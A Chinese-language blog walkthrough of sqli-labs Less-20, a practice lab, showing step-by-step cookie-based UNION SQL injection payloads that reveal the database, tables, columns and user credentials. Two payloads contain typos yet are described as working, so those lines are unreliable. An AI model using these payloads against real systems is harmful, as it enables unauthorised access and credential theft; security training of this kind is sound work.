sqli-labs-Less-20自动化注入方法

sqli-labs 实验记录

Less-20

这一关与前两关类似,需要通过分析源码进行手动报错注入,但注入点与之前的关卡不同,为Cookie,且可以使用Union Select联合注入方法。

第一步:分别输入正确与错误的用户名与密码,查找注入点

结合上一关爆出的数据,在用户与密码栏中分别输入正确与错误的数据:uname=Dumb passwd=12 与passwd=Dumb

结果如图如示:在密码正确的页面返回了Cookie信息,密码错误的页面只显示登陆失败。因此,我们考虑在Cookie这一点进行联合注入。

第二步:查询服务器中的当前数据库

利用Hackbar插件,在Cookie这一点输入如下数据:

复制代码
' union select 1,2,3 --+

结果如图所示:可以看到在name和password两个地方进行了回显,因此,可以进一步修改上面的数据:

复制代码
' union select 1,database(),3 --+

结果如图所示:在原先数字2的地方回显出当前数据库:security。

第三步:查询指定数据库中的表

继续使用hackbar插件,在Cooike注入点输入字符串:

复制代码
' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='security'),3--+

查询结果如图所示:数据表共有4个,分别是emails, referers, uagents, users。

第四步:查询指定数据表中的列

继续使用hackbar插件,在Cooike注入点输入字符串:

复制代码
' union select 1,(select group_concat(column_name) from information_schema.colmns where table_schema='security' and table_name='users'),3--+

查询结果如图所示:数据列共有3个,分别是id,username,password。

第五步:查询指定数据表中的具体信息

继续使用hackbar插件,在Cookie注入点输入字符串:

复制代码
' union select 1,(select concat(usersname,':',password) from security.users limit 0,1),3--+

结果如图所示:查询出一条数据,用户名为Dumb,密码为12。

如果需要继续查找其它数据,只需将"limit 0,1"中的'0',进行相应的修改,如"limit 1,1","limit 2,1"等等。

相关推荐
杭州默安科技11 分钟前
从告警到多防火墙联动封禁:智能体与XDR的自动化响应实践
人工智能·网络安全
宠友信息11 分钟前
Redis 内容社区源码架构优化与即时通讯数据一致性处理
spring boot·后端·websocket·mysql·uni-app
灯澜忆梦1 小时前
【MySQL1】| DDL 数据定义语言
数据库·sql·mysql
云栖梦泽在2 小时前
跨境电商账号频繁验证怎么办?从公网 IP、ASN、浏览器环境到登录稳定性排查
网络·网络协议·tcp/ip·网络安全·性能优化
七夜zippoe3 小时前
OpenClaw 数据加密:敏感信息保护的完整方案
数据库·mysql·php·openclaw·敏感保护
万亿少女的梦1683 小时前
基于Node.js和Express的旅游信息管理平台设计与开发
mysql·node.js·express·系统设计·旅游信息管理
万亿少女的梦16814 小时前
基于Python的高考志愿填报辅助系统设计与实现
java·spring boot·python·mysql·vue
万亿少女的梦16814 小时前
基于SpringBoot与Vue的历史博物馆展品展示与游客管理系统设计
spring boot·mysql·vue·系统设计·博物馆管理系统
灯澜忆梦17 小时前
MySQL 完整学习路线
学习·mysql
ClouGence17 小时前
保障公共安全,一线治安机构实时数据应用与实践
数据库·mysql·postgresql